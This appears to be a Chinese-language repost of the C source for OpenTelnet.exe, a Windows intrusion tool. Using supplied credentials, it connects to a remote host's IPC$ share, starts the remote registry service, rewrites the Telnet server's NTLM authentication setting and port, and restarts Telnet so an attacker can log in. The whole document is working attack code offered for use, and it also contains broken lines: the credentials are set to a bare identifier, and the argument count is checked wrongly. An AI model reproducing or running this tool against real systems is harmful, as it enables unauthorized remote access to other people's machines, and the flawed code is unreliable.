opentelnet.exe原始碼(C語言版)
// OpenTelnet.exe \\\\server username password NTLMAuthtelnetport
#include <stdio.h>
#include <assert.h>
#include <windows.h>
#include <Winnetwk.h>
#include <Winreg.h>
#include <Shlwapi.h>
#pragma comment(lib, “Advapi32.lib”)
#pragma comment(lib, “Mpr.lib”)
SC_HANDLE g_schSCManager;
HKEY g_hKey;
DWORD g_DefaultTelnetStartType;
DWORD g_DefaultRegistryStartType;
LPBYTE g_lpDefaultTelnetNTLM;
LPBYTE g_lpDefaultTelnetPort;
void Usage(char*);
int RestartTelnet();
int StartRemoteRegistry();
int MyStartService(SC_HANDLE, char*);
int main(int argc, char* argv[])
{
int nRetCode;
char szIpc[50] = “”;
HKEY hKey;
LPSTR lpUserName, lpPassword;
NETRESOURCE NET;
DWORD dwNTLM, dwTelnetPort;
Usage(argv[0]); //顯示歡迎及幫助資訊
if (argc < 5)
return 0;
sprintf (szIpc, “%s\\\\ipc$”, argv[1]);
lpUserName = liuyang; //使用者名稱
lpPassword = liuyang; //密碼
NET.lpLocalName = NULL;
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;
printf (“Connecting %s”,argv[1]);
ReConnect:
//清除與目標已經建立的IPC連線
nRetCode = WNetCancelConnection2(szIpc, CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Canncel Successfully!\\n”);
//與目標建立IPC連線
nRetCode = WNetAddConnection2(&NET, lpPassword, lpUserName, CONNECT_INTERACTIVE);
if (nRetCode == ERROR_ALREADY_ASSIGNED || nRetCode == ERROR_DEVICE_ALREADY_REMEMBERED)
{
printf (“Already conneted to the server!\\n”);
printf (“Now re-connecting the server\\n”);
goto ReConnect; //如果已經有了IPC連線,則返回ReConnect繼續嘗試
}
else if (nRetCode == NO_ERROR)
printf (“Successfully!\\n”); //建立連線成功
else
{
printf (“\\n\\tErr:”);
switch (nRetCode) //錯誤處理
{
case ERROR_ALREADY_ASSIGNED:
case ERROR_ACCESS_DENIED:
printf (“ERROR_ACCESS_DENIED\\n”);
break;
case ERROR_BAD_NET_NAME:
printf (“ERROR_BAD_NET_NAME\\n”);
break;
default:
printf (“CONNECT ERR:%d!\\n”,GetLastError());
break;
}
return 0;
}
//開啟目標的服務控制管理
g_schSCManager = OpenSCManager(argv[1], NULL, SC_MANAGER_ALL_ACCESS);
if (g_schSCManager == NULL)
{
printf (“Open SCManager failed!\\n”);
return 0;
}
//開啟遠端登錄檔服務
if (!StartRemoteRegistry())
{
printf (“All Process Failed!\\n”);
return 0;
}
//連線遠端登錄檔
if (!(RegConnectRegistry((LPCTSTR) argv[1], HKEY_LOCAL_MACHINE, &g_hKey) == ERROR_SUCCESS))
{
printf (“Connect remote registry failed!\\n”);
return 0;
}
//開啟telnet服務的登錄檔鍵值
if (!(RegOpenKeyEx(g_hKey, “SOFTWARE\\\\Microsoft\\\\TelnetServer\\\\1.0”, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS))
{
printf (“Open key failed!\\n”);
return 0;
}
//讀取登錄檔中telnet的原始值NTLM和Port
g_lpDefaultTelnetNTLM = (LPBYTE) LocalAlloc(LPTR, 50); //分配空間
g_lpDefaultTelnetPort = (LPBYTE) LocalAlloc(LPTR, 50);
DWORD dwDataSize = 50;
//將NTLM鍵值讀取到已分配空間的g_lpDefaultTelnetNTLM中,預設為2,這是為了恢復telnet的目的做的
if (!(RegQueryValueEx(hKey, “NTLM”, NULL, NULL, g_lpDefaultTelnetNTLM, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read NTLM failed!\\n ”);
return 0;
}
//將TelnetPort鍵值讀取到g_lpDefaultTelnetPort中,預設為23,這是為了恢復telnet的目的做的
if (!(RegQueryValueEx(hKey, “TelnetPort”, NULL, NULL, g_lpDefaultTelnetPort, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read port failed!\\n ”);
return 0;
}
//編輯NTLM和埠值
dwNTLM = atoi(argv[4]);
if (dwNTLM >= 3)
{
dwNTLM = 1;
}
dwTelnetPort = atoi(argv[5]);
//設定NTLM的鍵值
if (!(RegSetValueEx(hKey, “NTLM”, 0, REG_DWORD, (LPBYTE) &dwNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set NTLM value failed!”);
return 0;
}
//設定埠值
RegSetValueEx(hKey, “TelnetPort”, 0, REG_DWORD, (LPBYTE) &dwTelnetPort, sizeof(DWORD));
//重啟動telnet服務
nRetCode = RestartTelnet();
if (nRetCode)
{
printf (“\\nBINGLE!!!Yeah!!\\n”);
printf (“Telnet Port is %d. You can try:\\”telnet ip %d\\“, to connect the server!”, dwTelnetPort, dwTelnetPort);
}
//現在已經開啟了telnet服務,新增幾個鍵值來儲存修改以前的登錄檔設定,可以用resumetelnet來恢復
if (!(RegSetValueEx(hKey, “default_NTLM”, 0, REG_DWORD, g_lpDefaultTelnetNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultNTLM value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_Port”, 0, REG_DWORD, g_lpDefaultTelnetPort, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultPort value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_TelnetStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultTelnetStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaulttelnetstart value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_RegistryStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultRegistryStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultregistrystart value failed!”);
return 0;
}
RegCloseKey(hKey);
RegCloseKey(g_hKey); //關閉開啟的登錄檔鍵
//關閉服務控制管理SCManager
CloseServiceHandle(g_schSCManager);
//斷開遠端ipc連線
printf (“\\nDisconnecting server”);
nRetCode = WNetCancelConnection2(argv[1], CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Successfully!\\n”);
else
printf (“Failed!\\n”);
return 0;
}
void Usage(char* pcAppName) //顯示歡迎及幫助資訊
{
printf (“*******************************************************\\n”);
printf (“Remote Telnet Configure, by refdom\\n”);
printf (“Email: ”);
printf (“%s\\n\\n”, pcAppName);
printf (“Usage:OpenTelnet.exe \\\\\\\\server username password NTLMAuthtelnetport\\n”);
printf (“*******************************************************\\n”);
return;
}
int RestartTelnet() //重啟動telnet服務
{
DWORD dwWaitTime;
DWORD dwConfigSize;
SC_HANDLE schTelnetService;
SERVICE_STATUS ssTelnetStatus;
LPQUERY_SERVICE_CONFIG lpTelnetConfig;
printf (“\\nNOTICE!!!!!!\\n”);
printf (“The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23\\n\\n”);
//開啟telnet服務
schTelnetService = OpenService(g_schSCManager, “TlntSvr”, SERVICE_ALL_ACCESS);
if (schTelnetService == NULL)
{
printf (“Open service failed!\\n”);
return 0;
}
lpTelnetConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpTelnetConfig == NULL)
{
printf (“Alloc memory failed!\\n”);
return 0;
}
//獲取當前telnet服務的配置引數
if (!QueryServiceConfig(schTelnetService, lpTelnetConfig, 1024, &dwConfigSize))
{
printf (“Query service congfig failed!\\n”);
return 0;
}
//儲存預設的telnet服務啟動型別
g_DefaultTelnetStartType = lpTelnetConfig->dwStartType;
//將telnet服務的啟動型別改為程序通過呼叫StartService來啟動
if (lpTelnetConfig->dwStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schTelnetService,
SERVICE_NO_CHANGE,
SERVICE_DEMAND_START,
SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL, NULL))
{
printf (“Change service config failed!\\n”);
return 0;
}
}
//獲取當前telnet服務的狀態
if (!(QueryServiceStatus(schTelnetService, &ssTelnetStatus)))
{
printf (“Query service status failed!\\n”);
return 0;
}
//如果telnet服務當前狀態不是stop的話,停止服務
if (ssTelnetStatus.dwCurrentState != SERVICE_STOPPED && ssTelnetStatus.dwCurrentState != SERVICE_STOP_PENDING)
{
printf (“Stopping telnet service ”);
if (!(ControlService(schTelnetService, SERVICE_CONTROL_STOP, &ssTelnetStatus)))
{
printf (“Control telnet service status failed!\\n”);
return 0;
}
//sleep一段時間來等待telnet服務的停止
dwWaitTime = ssTelnetStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
dwWaitTime = 10000;
Sleep(dwWaitTime);
if (!QueryServiceStatus(schTelnetService, &ssTelnetStatus))
{
printf (“Query service status failed!\\n”);
}
if ( ssTelnetStatus.dwCurrentState == SERVICE_STOPPED || ssTelnetStatus.dwCurrentState == SERVICE_STOP_PENDING)
{
printf (“Telnet service is stopped successfully!\\n”);
}
else
{
printf (“Stopping telnet service failed!\\n”);
return 0;
}
} //此時telnet服務已經成功停止
//呼叫MyStartService來重新啟動telnet服務
if (!MyStartService(schTelnetService, “telnet”))
return 0;
CloseServiceHandle(schTelnetService); //關閉服務控制代碼
return 1;
}
int StartRemoteRegistry() //啟動遠端登錄檔服務
{
SC_HANDLE schRegistryService;
SERVICE_STATUS ssRegistryStatus;
LPQUERY_SERVICE_CONFIG lpRegistryConfig;
DWORD dwConfigSize;
lpRegistryConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpRegistryConfig == NULL)
{
printf (“Alloc memory failed!\\n”);
return 0;
}
//開啟遠端登錄檔服務
schRegistryService = OpenService( g_schSCManager, “RemoteRegistry”, SERVICE_ALL_ACCESS);
if (schRegistryService == NULL)
{
printf (“Open remote registry service failed!\\n”);
return 0;
}
//查詢當前服務狀態
if (!QueryServiceConfig(schRegistryService, lpRegistryConfig, 1024, &dwConfigSize))
{
printf (“Query registry service config failed!\\n”);
return 0;
}
//判斷當前服務啟動型別,如果是禁用則改變為通過StartService來啟動服務
g_DefaultRegistryStartType = lpRegistryConfig->dwStartType;
if (g_DefaultRegistryStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schRegistryService,
SERVICE_NO_CHANGE,
SERVICE_DEMAND_START,
SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL,NULL))
{
printf (“Change registry service config failed!\\n”);
return 0;
}
}
//查詢服務狀態
if (!QueryServiceStatus(schRegistryService, &ssRegistryStatus))
{
printf (“Query remote registry service failed!\\n”);
return 0;
}
//如果當前服務並沒有啟動,則呼叫MyStartService來啟動
if (ssRegistryStatus.dwCurrentState != SERVICE_RUNNING)
{
if (!MyStartService(schRegistryService, “remote registry”))
return 0;
}
CloseServiceHandle(schRegistryService);
return 1;
}
int MyStartService(SC_HANDLE schService, char* szServiceName) //啟動指定的服務
{
DWORD dwWaitTime;
DWORD dwOldCheckPoint;
DWORD dwStartTickCount;
SERVICE_STATUS ssStatus;
//呼叫StartService啟動服務
printf (“Starting %s service\\n”, szServiceName);
if (!(StartService(schService, 0, NULL)))
{
printf (“Starting %s service failed!\\n”, szServiceName);
return 0;
}
//獲取當前服務狀態
if (!(QueryServiceStatus(schService, &ssStatus)))
{
printf (“Query %s service status failed!\\n”,szServiceName);
// return ;
}
dwStartTickCount = GetTickCount(); //得到程序執行時間
dwOldCheckPoint = ssStatus.dwCheckPoint;
while ( ssStatus.dwCurrentState == SERVICE_START_PENDING)
{
dwWaitTime = ssStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
dwWaitTime = 10000;
Sleep(dwWaitTime);
//重新再查詢狀態
if (!QueryServiceStatus(schService, &ssStatus))
break;
if ( ssStatus.dwCheckPoint > dwOldCheckPoint )
{
//服務啟動中
dwStartTickCount = GetTickCount();
dwOldCheckPoint = ssStatus.dwCheckPoint;
}
else
{
if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint)
{
//在建議等待的時間內服務沒有啟動
break;
}
}
}
if ( ssStatus.dwCurrentState == SERVICE_RUNNING )
{
printf (“%s service is started successfully! %s service is running!\\n”, szServiceName, szServiceName);
}
else
{
printf (“%s service is not started!\\n”, szServiceName);
return 0;
}
return 1;
}